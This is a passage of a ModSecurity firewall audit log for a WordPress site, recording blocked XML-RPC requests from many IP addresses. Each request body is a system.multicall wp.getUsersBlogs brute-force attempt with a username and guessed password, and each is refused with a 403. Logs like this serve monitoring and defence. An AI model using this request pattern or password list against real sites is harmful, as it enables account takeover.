--0efd071e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123!!! --0efd071e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0efd071e-E-- --0efd071e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100298446522 5766 (- - -) Stopwatch2: 1749100298446522 5766; combined=4080, p1=499, p2=3416, p3=0, p4=0, p5=98, sr=91, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0efd071e-Z-- --cc037f53-A-- [05/Jun/2025:12:12:23 +0700] aEEnN-th7G2xELALzPYg3AAAANc 103.236.140.4 35394 103.236.140.4 8181 --cc037f53-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cc037f53-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2 --cc037f53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc037f53-E-- --cc037f53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100343259382 5699 (- - -) Stopwatch2: 1749100343259382 5699; combined=4109, p1=490, p2=3447, p3=0, p4=0, p5=101, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc037f53-Z-- --b60e162c-A-- [05/Jun/2025:12:12:50 +0700] aEEnUuth7G2xELALzPYg4wAAAMU 103.236.140.4 35412 103.236.140.4 8181 --b60e162c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.21.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.21.131 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b60e162c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin168 --b60e162c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b60e162c-E-- --b60e162c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.21.131 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100370255821 6383 (- - -) Stopwatch2: 1749100370255821 6383; combined=4420, p1=543, p2=3680, p3=0, p4=0, p5=117, sr=104, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b60e162c-Z-- --5dd5f32e-A-- [05/Jun/2025:12:13:02 +0700] aEEnXuth7G2xELALzPYg5wAAAMk 103.236.140.4 35424 103.236.140.4 8181 --5dd5f32e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5dd5f32e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123$$$ --5dd5f32e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd5f32e-E-- --5dd5f32e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100382955891 6110 (- - -) Stopwatch2: 1749100382955891 6110; combined=4352, p1=535, p2=3639, p3=0, p4=0, p5=106, sr=107, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd5f32e-Z-- --5e5a0a51-A-- [05/Jun/2025:12:13:19 +0700] aEEnb-th7G2xELALzPYg7AAAAM0 103.236.140.4 35436 103.236.140.4 8181 --5e5a0a51-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 476 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5e5a0a51-C-- system.multicallmethodNamewp.getUsersBlogsparamstest1234 --5e5a0a51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e5a0a51-E-- --5e5a0a51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100399016372 4806 (- - -) Stopwatch2: 1749100399016372 4806; combined=3537, p1=416, p2=2963, p3=0, p4=0, p5=92, sr=84, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e5a0a51-Z-- --0436d773-A-- [05/Jun/2025:12:14:16 +0700] aEEnqFwdJdhOudw5hdzO8QAAAJM 103.236.140.4 35464 103.236.140.4 8181 --0436d773-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0436d773-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin@12 --0436d773-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0436d773-E-- --0436d773-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100456889222 4595 (- - -) Stopwatch2: 1749100456889222 4595; combined=3531, p1=380, p2=2987, p3=0, p4=0, p5=96, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0436d773-Z-- --d0c1a332-A-- [05/Jun/2025:12:14:27 +0700] aEEns-th7G2xELALzPYg-wAAAMU 103.236.140.4 35472 103.236.140.4 8181 --d0c1a332-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d0c1a332-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@007 --d0c1a332-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0c1a332-E-- --d0c1a332-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100467085601 4641 (- - -) Stopwatch2: 1749100467085601 4641; combined=3505, p1=361, p2=2953, p3=0, p4=0, p5=111, sr=79, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0c1a332-Z-- --84cf3522-A-- [05/Jun/2025:12:14:47 +0700] aEEnx-th7G2xELALzPYhAQAAAMs 103.236.140.4 35488 103.236.140.4 8181 --84cf3522-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --84cf3522-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin@12345678 --84cf3522-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84cf3522-E-- --84cf3522-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100487561917 4802 (- - -) Stopwatch2: 1749100487561917 4802; combined=3670, p1=420, p2=3084, p3=0, p4=0, p5=97, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84cf3522-Z-- --95edf77f-A-- [05/Jun/2025:12:15:09 +0700] aEEn3eth7G2xELALzPYhCAAAANI 103.236.140.4 35510 103.236.140.4 8181 --95edf77f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --95edf77f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh_password --95edf77f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95edf77f-E-- --95edf77f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100509838551 5000 (- - -) Stopwatch2: 1749100509838551 5000; combined=3535, p1=432, p2=2958, p3=0, p4=0, p5=86, sr=76, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95edf77f-Z-- --281c4c3e-A-- [05/Jun/2025:12:16:07 +0700] aEEoF3-K7ToMdu-YSIIkUwAAAAY 103.236.140.4 35552 103.236.140.4 8181 --281c4c3e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --281c4c3e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh!12345 --281c4c3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281c4c3e-E-- --281c4c3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (3+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100567156874 4611 (- - -) Stopwatch2: 1749100567156874 4611; combined=3566, p1=410, p2=2990, p3=0, p4=0, p5=97, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281c4c3e-Z-- --72c7f37c-A-- [05/Jun/2025:12:16:10 +0700] aEEoGuth7G2xELALzPYhFgAAAMc 103.236.140.4 35556 103.236.140.4 8181 --72c7f37c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.55.71 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.55.71 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --72c7f37c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh!12345 --72c7f37c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c7f37c-E-- --72c7f37c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.55.71 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100570598798 5482 (- - -) Stopwatch2: 1749100570598798 5482; combined=3909, p1=481, p2=3253, p3=0, p4=0, p5=105, sr=83, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c7f37c-Z-- --efd71a44-A-- [05/Jun/2025:12:17:01 +0700] aEEoTX-K7ToMdu-YSIIkWQAAAAw 103.236.140.4 35590 103.236.140.4 8181 --efd71a44-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --efd71a44-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin_password --efd71a44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efd71a44-E-- --efd71a44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100621140350 5656 (- - -) Stopwatch2: 1749100621140350 5656; combined=4138, p1=488, p2=3478, p3=0, p4=0, p5=100, sr=100, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efd71a44-Z-- --8ec0cf2d-A-- [05/Jun/2025:12:17:46 +0700] aEEoeuth7G2xELALzPYhJgAAANg 103.236.140.4 35610 103.236.140.4 8181 --8ec0cf2d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.55.71 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.55.71 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8ec0cf2d-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin12345678 --8ec0cf2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ec0cf2d-E-- --8ec0cf2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.55.71 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100666294614 5251 (- - -) Stopwatch2: 1749100666294614 5251; combined=3885, p1=447, p2=3269, p3=0, p4=0, p5=99, sr=89, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ec0cf2d-Z-- --c750a25a-A-- [05/Jun/2025:12:17:49 +0700] aEEofeth7G2xELALzPYhKAAAAMI 103.236.140.4 35614 103.236.140.4 8181 --c750a25a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c750a25a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin12345678 --c750a25a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c750a25a-E-- --c750a25a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100669423610 4477 (- - -) Stopwatch2: 1749100669423610 4477; combined=3538, p1=366, p2=3006, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c750a25a-Z-- --3d197619-A-- [05/Jun/2025:12:18:11 +0700] aEEok-th7G2xELALzPYhLAAAAMk 103.236.140.4 35632 103.236.140.4 8181 --3d197619-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3d197619-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin!12345 --3d197619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d197619-E-- --3d197619-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100691510888 5874 (- - -) Stopwatch2: 1749100691510888 5874; combined=4135, p1=507, p2=3449, p3=0, p4=0, p5=108, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d197619-Z-- --e819333a-A-- [05/Jun/2025:12:18:24 +0700] aEEooFwdJdhOudw5hdzPBgAAAJA 103.236.140.4 35642 103.236.140.4 8181 --e819333a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e819333a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123+ --e819333a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e819333a-E-- --e819333a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100704865212 4836 (- - -) Stopwatch2: 1749100704865212 4836; combined=3657, p1=404, p2=3087, p3=0, p4=0, p5=96, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e819333a-Z-- --b81c9c3d-A-- [05/Jun/2025:12:18:51 +0700] aEEou-th7G2xELALzPYhNQAAANI 103.236.140.4 35654 103.236.140.4 8181 --b81c9c3d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 